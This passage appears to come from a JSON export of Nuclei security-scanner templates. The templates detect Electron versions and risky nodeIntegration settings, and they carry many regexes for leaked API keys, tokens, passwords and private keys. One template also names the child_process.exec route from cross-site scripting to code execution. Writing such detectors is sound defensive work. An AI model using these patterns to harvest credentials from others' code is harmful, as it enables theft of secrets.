4a0a004730450221009ad4de0abc82c172ead956fa70e1a84b3baff31c544569a254f7cf7d255e41cf02200bae7cf84580e9b008236464ea25f105d51c97951521af9c5e96b3ca11a1ad48:922c64590222798bb761d5b6d8e72950", "hash": "c1fc1d075452e45c0d55442f7f117694", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ccb" }, "name": "electron-version-detect.yaml", "content": "id: electron-version-detect\n\ninfo:\n name: Electron Version - Detect\n author: me9187\n severity: info\n reference:\n - https://www.electronjs.org/blog/chromium-rce-vulnerability/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: electron,file\n\nfile:\n - extensions:\n - json\n\n extractors:\n - type: regex\n regex:\n - '\"electronVersion\":\"[^\"]*\"'\n# digest: 4b0a00483046022100a93dfde5beb023a02145111d3e9c07e640ec686696e643c5370c9e442e2497d5022100f81edbb6c9bbd6977b3c7955b95aab77938f943b6878f161182fbf0e265d2efa:922c64590222798bb761d5b6d8e72950", "hash": "77f07ba159d8198e2d8b57e99f8bfe4b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ccc" }, "name": "node-integration-enabled.yaml", "content": "id: node-integration-enabled\n\ninfo:\n name: Electron Applications - Cross-Site Scripting & Remote Code Execution\n author: me9187\n severity: critical\n description: |\n Electron Applications is susceptible to remote code execution by way of cross-site scripting via nodeIntegration by calling require('child_process').exec('COMMAND');.\n reference:\n - https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/\n - https://book.hacktricks.xyz/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps\n tags: electron,file,nodejs,xss\n\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n words:\n - \"nodeIntegration: true\"\n# digest: 
4a0a0047304502204786705d88a14d1888a277cc5d93556cfec1f62f07c6b52fc67bd398eacad084022100d8b0127552cdfea68abfa470f367757cf4d7496dc287ac4826131928c2526233:922c64590222798bb761d5b6d8e72950", "hash": "513e78669f3e5ccc69c8cf3754709f64", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ccd" }, "name": "js-analyse.yaml", "content": "id: js-analyse\n\ninfo:\n name: JS Analyse\n author: ayadim\n severity: info\n description: |\n This process involves extracting tokens, endpoints, URIs, and variable names from the JS file and analyzing them for any potential weaknesses that could be exploited. By extracting and analyzing these elements, potential security threats can be identified, allowing for proactive measures to be taken to mitigate any risks associated with the application. This process can be used as part of a comprehensive bug-hunting strategy to ensure the security of an application.\n metadata:\n verified: true\n tags: file,js-analyse,js\n\nfile:\n - extensions:\n - js\n\n extractors:\n - type: regex\n name: extracted-token\n regex:\n - \"(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token|secretaccesskey)([-|_][a-z]+)?(\\\\s)*(:|=)+\"\n\n - type: regex\n name: extracted-endpoints\n regex:\n - \"(?i)('|\\\")((\\\\.{0,2})|([a-z0-9-_]*))/([a-z0-9-_/=:&?\\\\.]+)('|\\\")\"\n - \"(?i)}\\\\s*/[a-z0-9-_?=&/]+\"\n - \"(?i)path\\\\s*(:|=)\\\\s*('|\\\")[a-z0-9-_?=&:\\\\./]+('|\\\")\"\n\n - type: regex\n name: extracted-uri\n regex:\n - \"(?i)([a-z]{2,10}):(//|/)[a-z0-9\\\\./?&-_=:]+\"\n\n - type: regex\n name: amazon-access-key\n regex:\n - \"(?i)(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\"\n\n - type: regex\n name: amazon-s3-url\n regex:\n - \"(?i)([a-z0-9_\\\\-\\\\.]+\\\\.s3\\\\.amazonaws\\\\.com)\"\n - \"(?i)([a-z0-9\\\\.-]+\\\\.s3-[a-z0-9-\\\\.]+\\\\.amazonaws\\\\.com)\"\n - \"(?i)[a-z0-9\\\\.-]+\\\\.s3-website[\\\\.-](eu|ap|us|ca|sa|cn)\"\n - 
\"(?i)(s3://[a-z0-9_\\\\-\\\\./]+)\"\n - \"(?i)(s3\\\\.amazonaws\\\\.com/[a-z0-9/_\\\\-\\\\.]+)\"\n - \"(?i)(s3\\\\.console\\\\.aws\\\\.com/s3/buckets/[a-z0-9/_\\\\-\\\\.]+)\"\n - \"(?i)(s3-[a-z0-9-\\\\.]\\\\.amazonaws\\\\.com/[a-z0-9/_\\\\-\\\\.]+)\"\n\n - type: regex\n name: github-personal-access-token\n regex:\n - \"(?i)(ghp_[a-z0-9]{36}|github_pat_[a-z0-9]{82})\"\n\n - type: regex\n name: github-oauth-access-token\n regex:\n - \"(?i)(gho_[a-zA-Z0-9]{36})\"\n\n - type: regex\n name: github-app-token\n regex:\n - \"\\b((?:ghu|ghs)_[a-zA-Z0-9]{36})\\b\"\n\n - type: regex\n name: authorization-basic\n regex:\n - \"(?i)(Authorization:\\\\sbasic\\\\s+[a-z0-9=:_\\\\-+/]{5,100})\"\n\n - type: regex\n name: authorization-bearer\n regex:\n - \"(?i)(Authorization:\\\\sbearer\\\\s+[a-z0-9=:_\\\\-\\\\.+/]{5,100})\"\n\n - type: regex\n name: rsa-private-key\n regex:\n - \"(?i)(-----BEGIN RSA PRIVATE KEY-----)\"\n\n - type: regex\n name: ssh-dsa-private-key\n regex:\n - \"(?i)(-----BEGIN DSA PRIVATE KEY-----)\"\n\n - type: regex\n name: ssh-ec-private-key\n regex:\n - \"(?i)(-----BEGIN EC PRIVATE KEY-----)\"\n\n - type: regex\n name: potential-ajax-request\n regex:\n - \"(?i)(new\\\\s+xmlhttprequest\\\\(\\\\)|\\\\$\\\\.ajax\\\\(\\\\{)\"\n# digest: 4a0a00473045022100a1dfbb218bb6e589fe608e853b26ab2acd789a197a02d92e3f0499331b80e03602206ac9cf015a855085c501f0e372f587e6dd518133e9bb9781de0d34ee15266bb9:922c64590222798bb761d5b6d8e72950", "hash": "8b3d557ff6a907ca2ef3649dcb89d530", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cce" }, "name": "adafruit-key.yaml", "content": "id: adafruit-key\n\ninfo:\n name: Adafruit API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.go\n metadata:\n verified: true\n tags: 
adafruit,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:adafruit)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9_-]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a00473045022100e18e66c25918d1d8e980ab39a1d206e65dc34ef8b6ae0e043c87d34f0496d4260220651cd87fb75b897e27766f354e0711534ef67b6f368885d00fbf79ed44ed72a7:922c64590222798bb761d5b6d8e72950\n", "hash": "adc0a025b5a861513d4fefd0fa6939aa", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ccf" }, "name": "airtable-key.yaml", "content": "id: airtable-key\n\ninfo:\n name: Airtable API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go\n metadata:\n verified: true\n tags: keys,file,airtable,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:airtable)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{17})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 490a004630440220673067de4dbbe1d9d4f9337d2eddd6903ed401646b5e2ef23b4cb4fbc15e4bb40220774a7aafc56f3023bd7d681d429badb45d714352a8fcb74844e5913b116cfce2:922c64590222798bb761d5b6d8e72950", "hash": "1612a5d8954107296c8ea9bcbe785ca1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd0" }, "name": "algolia-key.yaml", "content": "id: algolia-key\n\ninfo:\n name: Algolia API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.go\n 
metadata:\n verified: true\n tags: algolia,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:algolia)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a0047304502200114ce7db1c3fde42b20020e1d0ccddb88507568c665f21e1cdc8a7b722defdb022100c707d824ef36106683f16cc962e32ac899c727c5b22db59a7af8a4ab957a27d6:922c64590222798bb761d5b6d8e72950\n", "hash": "f26a54d26ff9d699638f0a0409db2af8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd1" }, "name": "beamer-api-token.yaml", "content": "id: beamer-api-token\n\ninfo:\n name: Beamer API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.go\n metadata:\n verified: true\n tags: file,keys,beamer,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:beamer)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}(b_[a-z0-9=_\\-]{44})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022100fcfc6abc15f7dbbac899737691fc7df9720aa9fa24c15b3ab39d26c012479b6f022014363cacef4a92e1d65e067c948733f94b555d8d657b9007bc52d804b3c444cc:922c64590222798bb761d5b6d8e72950", "hash": "3bacdbc2d70204a95f5c08d99f7cbf57", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd2" }, "name": "branch-key.yaml", "content": "id: branch-key\n\ninfo:\n name: Branch.io Live Key - Detect\n author: 0xh7ml\n severity: info\n description: Branch.io live key token was detected.\n reference:\n - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74\n classification:\n cvss-metrics: 
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,keys,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"key_live_.{32}\"\n\n# Enhanced by md on 2023/05/04\n# digest: 490a004630440220307fbc9759a842b11dab44b3a55e808d8e8a5b11cfad4fab56ae5bf6d7ff7ff602203a4a0c6e88a0cc25f9b4869f95a86611d5b5a789fe519bf11f8be6fa685ba02c:922c64590222798bb761d5b6d8e72950", "hash": "d897c90b6e314226ad53b7547add3e2e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd3" }, "name": "clojars-api-token.yaml", "content": "id: clojars-api-token\n\ninfo:\n name: Clojars API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.go\n metadata:\n verified: true\n tags: file,keys,clojars,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(CLOJARS_)[a-z0-9]{60}\n# digest: 4a0a00473045022100e8e34978eeeb59acc43a8c856b5fc0749395c50c95f49496f094ac4cf789dfa0022023f583e761abc90a1bdc22094f12af0e622aa61686970bfa18d42db1cb3a79ff:922c64590222798bb761d5b6d8e72950", "hash": "d3d271743903c182014f8cba8df2562c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd4" }, "name": "cloudinary.yaml", "content": "id: cloudinary-basic-auth\n\ninfo:\n name: Cloudinary Basic Authorization - Detect\n author: gaurang\n severity: high\n description: Cloudinary basic authorization token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cwe-id: CWE-200\n tags: keys,file,token,cloudinary\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"cloudinary://[0-9]{15}:[0-9A-Za-z\\\\-_]+@[0-9A-Za-z\\\\-_]+\"\n\n# Enhanced by md on 
2023/05/04\n# digest: 490a0046304402201744d25857ea77e5daf43a26dc6f905aeb2b0a623b26aa428c90aa67ff84b3c502205bc4dd714202f82f1cbd9ad2b1b5d7d9d97213f83918afc43b060b4970e5f493:922c64590222798bb761d5b6d8e72950", "hash": "25408269bed4a1fea6898c6093b9e4d4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd5" }, "name": "code-climate-token.yaml", "content": "id: code-climate-token\n\ninfo:\n name: Code Climate Token - Detect\n author: DhiyaneshDK\n severity: info\n description: Code Climate token was detected.\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/codeclimate.yml\n - https://github.com/codeclimate/ruby-test-reporter/issues/34\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: file,keys,codeclimate,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)codeclima.{0,50}\\b([a-f0-9]{64})\\b'\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a0047304502200e6bd9867a66b28556bb5e59fc7dd5582ac68f9dff902978f3672453fcff2936022100ba11083fa52bea39929d563d17d8875f3464ce09d21e96d15a3b6faaea2b8453:922c64590222798bb761d5b6d8e72950", "hash": "c04bf8454e50c72b0a0a11eb34f6ec06", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd6" }, "name": "codecov-access-token.yaml", "content": "id: codecov-access-token\n\ninfo:\n name: Codecov Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.go\n metadata:\n verified: true\n tags: file,keys,codecov,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:codecov)(?:[0-9a-z\\-_\\t 
.]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a004830460221008723ce3d0d49d00043601d70f614318dd71d3c20680925198c2a9894cc454460022100cd817ccf94a80cfa81cc2cb192791e916edb1a8612a6ee15e604bbf2dc33d1d6:922c64590222798bb761d5b6d8e72950", "hash": "de68cc8c59908346a63dd13d68007cf1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd7" }, "name": "coinbase-access-token.yaml", "content": "id: coinbase-access-token\n\ninfo:\n name: Coinbase Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.go\n metadata:\n verified: true\n tags: file,keys,coinbase,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:coinbase)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9_-]{64})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022100b0e43a01846e52c6ab419c0c554ba0dd5ec2a1707ad7e7d487551fb5de15fe1e02205ffefab3d7d66389b1b96b8cb008b8673e94b4abdc43f32f3771722323bb5d32:922c64590222798bb761d5b6d8e72950", "hash": "88103e3213f9a3937e9832b76338fd29", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd8" }, "name": "contentful-api-token.yaml", "content": "id: contentful-api-token\n\ninfo:\n name: Contentful Delivery API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.go\n metadata:\n verified: true\n tags: 
file,keys,contentful,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:contentful)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9=_\\-]{43})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100a46c48e50f22fbb3d9976aa5180b3083c6d77903067dc0fee7c14580261a2da1022100fadbf251c47aea97f30f39aa444da8f271f7d5fb0833c77bc0a52ac6b39b7cbf:922c64590222798bb761d5b6d8e72950", "hash": "f42782bc0bea0411cbdef44f79ec92b1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cd9" }, "name": "cratesio-api-key.yaml", "content": "id: cratesio-api-key\n\ninfo:\n name: Crates.io API Key - Detect\n author: DhiyaneshDK\n severity: info\n description: Crates.io API key was detected.\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/crates.io.yml\n - https://crates.io/data-access\n - https://github.com/rust-lang/crates.io/blob/master/src/util/token.rs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: keys,file,crates,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\bcio[a-zA-Z0-9]{32}\\b'\n\n# Enhanced by md on 2023/05/04\n# digest: 4b0a00483046022100cdb57fbebbea0f610e2da0421aa23ce8ed6cdc12d5bb09d7b02f8b7f99f47eb5022100bf1a5d9c555af349ba146cd09185e141c95bd8e4ea0a6eb00049f2b22b21b300:922c64590222798bb761d5b6d8e72950", "hash": "6c22353feb3f6b46a68fc93760f66635", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307cda" }, "name": "credential-exposure-file.yaml", "content": "id: credentials-disclosure-file\n\ninfo:\n name: Credentials Disclosure Check\n author: Sy3Omda,geeknik,forgedhallpass,ayadi\n severity: unknown\n description: Check for multiple keys/tokens/passwords hidden inside of files.\n tags: 
exposure,token,file,disclosure\n# Extract secrets regex like api keys, password, token, etc ... for different services.\n# Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue.\n# Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes.\n# Regex count:- 687\n# Notes:-\n# This template requires manual inspection once found valid match.\n# Generic token could be anything matching below regex.\n# Impact of leaked token depends on validation of leaked token.\n# The regexes are copied from exposures/tokens/generic/credentials-disclosure.yaml\n# TODO After https://github.com/projectdiscovery/nuclei/issues/1510 is implemented, we should be able to re-use them, instead of duplicating\n# Example cases to match against: https://regex101.com/r/HPtaU2/1\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"(?i)[\\\"']?zopim[_-]?account[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?zhuliang[_-]?gh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?zensonatypepassword[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)zendesk(_api_token|_key|_token|-travis-github|_url|_username)(\\\\s|=)\"\n - \"(?i)[\\\"']?yt[_-]?server[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yt[_-]?partner[_-]?refresh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yt[_-]?partner[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yt[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yt[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n 
]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yt[_-]?account[_-]?refresh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yt[_-]?account[_-]?client[_-]?secret[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yangshun[_-]?gh[_-]?token[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?yangshun[_-]?gh[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?www[_-]?googleapis[_-]?com[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpt[_-]?ssh[_-]?connect[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpt[_-]?report[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpt[_-]?prepare[_-]?dir[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpt[_-]?db[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpt[_-]?db[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wporg[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wordpress[_-]?db[_-]?user[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wordpress[_-]?db[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wincert[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
\"(?i)[\\\"']?widget[_-]?test[_-]?server[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?fb[_-]?password[_-]?3[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?fb[_-]?password[_-]?2[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?fb[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?basic[_-]?password[_-]?5[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?basic[_-]?password[_-]?4[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?basic[_-]?password[_-]?3[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?basic[_-]?password[_-]?2[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?widget[_-]?basic[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?watson[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?watson[_-]?device[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?watson[_-]?conversation[_-]?password[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?wakatime[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?vscetoken[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?visual[_-]?recognition[_-]?api[_-]?key[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - \"(?i)[\\\"']?virustotal[_-]?apikey[\\\"']?[^\\\\S\\r\n\n ]*[=:][^\\\\S\\r\n\n ]*[\\\"']?[\\\\w-]+[\\\"']?\"\n - 
